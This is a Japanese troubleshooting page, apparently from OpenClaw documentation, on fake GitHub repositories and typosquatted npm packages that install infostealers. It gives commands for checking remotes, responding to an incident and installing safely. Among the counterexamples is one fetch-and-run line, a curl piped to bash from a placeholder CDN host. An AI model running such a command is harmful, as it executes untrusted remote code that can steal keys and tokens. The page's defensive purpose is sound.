$cd ../troubleshooting/
偽GitHubリポジトリ — OpenClawを装ったインフォスティーラ
// 2026年初頭から、タイポスクワットとfork spamリポジトリ(openclaw-ai、open-claw-official、clawdbot-pro等)のインストールスクリプトがGhostSocks、Atomic Stealer、クリップボードハイジャッカーを取得します。READMEバッジとnpmパッケージ名を模倣。唯一の公式ソースリポジトリはgithub.com/openclaw/openclaw — curl | bashインストール前に必ず検証。
diagnose.sh
🔍 これがあなたの問題ですか?
?SNS、Discord、またはopenclaw/openclawと完全一致しない類似名repoのリンクからインストール
?インストール後に予期しない出站接続や新LaunchAgents/Scheduled Task
?git remote -vまたはnpm ls -gがfork、typoパッケージ、未知GitHubユーザーをorigin表示
verify_remote.sh
✅ 修正1 — 公式remoteからcloneしたことを確認
疑わしい場合github.com/openclaw/openclawから再clone
# 公式repo ONLY git ls-remote https://github.com/openclaw/openclaw HEAD # ローカルcloneがある場合: cd ~/openclaw git remote -v # 必須:https://github.com/openclaw/openclaw.git # または:git@github.com:openclaw/openclaw.git # remoteが間違い?pullしない — 公式URLから新規clone
incident_response.sh
✅ 修正2 — ホストを隔離し全シークレットをローテーション
ローテーションまで侵害扱い — stealerは既にexfiltrate済みの可能性
# ネットワーク切断(Wi-Fi off / Ethernet抜く) # 疑わしいインストール削除 npm uninstall -g openclaw open-claw openclaw-cli 2>/dev/null rm -rf ~/suspicious-openclaw-clone # このホストに触れた全secretをローテーション: # - OpenAI / Anthropic / Gemini APIキー # - OPENCLAW_GATEWAY_TOKEN # - Telegram / Discord bot token # - SSH鍵 (~/.ssh) — 新鍵生成、サーバーで旧鍵失効 # - stealer疑い:macOS Keychain / ブラウザ保存パスワード # スキャン(macOS):XProtect + ~/Library/LaunchAgents手動確認
safe_install.sh
✅ 修正3 — 今後のインストール習慣を強化
ドメインがgithub.com/openclawでなければ停止
# 安全なインストールパターン(公式のみ): # npm — 先にnpmjs.com/package/openclawでpublisher確認 npm install -g openclaw # git — 未知ドメインからcurl|bashしない git clone https://github.com/openclaw/openclaw.git cd openclaw && npm ci # 絶対にしない: # curl -fsSL https://random-cdn.example/install.sh | bash # 未検証openclaw-* tapからbrew install
💡 プロのヒント:リリースチェックサムを比較
github.com/openclaw/openclawの公式リリースはバンドルバイナリのSHA256を公開。インストールスクリプトがチェックサム検証をスキップしたりランダムCDNを指す場合、star数に関わらず即停止 — 危険信号です。
🛡️ 予防チェックリスト
- • https://github.com/openclaw/openclaw のみブックマーク — 「OpenClaw download」スポンサー広告をクリックしない
- • github.comまたはnpmjs.com以外のドメインからcurlするインストールスクリプトを拒否
- • npmインストールは公式orgが公開するパッケージ名に固定 — npmjs.com/package/openclawで確認
- • APIキーを保持するマシンでgit pull前にgit remote -v
- • 新ソースからインストール後openclaw doctor — paranoidならバイナリhashをリリースノートと比較
❓ FAQ
Q1. 偽リポジトリからインストールしたかどうか確認する方法は?
使用したcloneでgit remote -vを確認、またはシェル履歴のcurl | bash URLをレビュー。偽リポジトリはopenclaw-install.xyz、ランダムユーザー下のraw.githubusercontent.com、短縮リンクをよく使います。github.com/openclaw/openclawのみと比較。clone URLに余分なハイフン、official、freeがあれば無実が証明されるまで侵害とみなす。
Q2. 偽OpenClawインストーラーで報告されているマルウェアは?
コミュニティ報告にはGhostSocks(プロキシボットネット)、Atomic Stealer(macOSキーチェーン+ブラウザcookie)、~/.openclaw/.env、SSH鍵、Telegram bot tokenを窃取する汎用npm preinstallスクリプト。Windowsビルドは永続Scheduled Taskをdropする場合あり。非公式インストールは潜在的な全ホスト侵害として扱う。
Q3. typo npmパッケージからnpm install -gしただけ — 安全?
必ずしも安全ではありません。Typosquat npm(open-claw、openclaw-cli-free)はpostinstallでユーザー権限実行可能。パッケージアンインストール、node_modules削除、マシンに存在した全secretローテーション、OSベンダーツールでスキャン。npmjs.comでpublisherが公式GitHub orgと一致確認後にnpm install -g openclaw。
Q4. マシンをワイプすべきかキーのみローテーション?
本番APIキー、SSHデプロイ鍵、cryptoウォレットを保持しinfostealer級payloadを受けたマシンでは、OS再インストールが保守的選択。secretなしサンドボックスVMなら隔離(ネットワーク切断)、偽インストール削除、存在したキーをローテーション、72時間出站接続監視。
Q5. Discord/Telegramの「OpenClaw Pro」ダウンロードリンクは正当?
公式OpenClaw配布はDiscord DM EXE、Telegram APK、Google Drive zipを使いません。公式チャネルはGitHub repo、documented npmパッケージ、そのrepoからリンクされたdocs。「無料GPT-4付きpreconfigured OpenClaw」を売る者はscamまたはmalware campaign。
Q6. 偽repoを responsible に報告する方法は?
GitHubのReport repository → malware/phishing。悪意あるcommitまたはinstall.sh行番号を含める。typosquat npmパッケージがあればnpm securityに通知。公開issueに動作するexploit URLを投稿しない — 動作とhashサンプルを記述。警告ではgithub.com/openclaw/openclawのみリンク。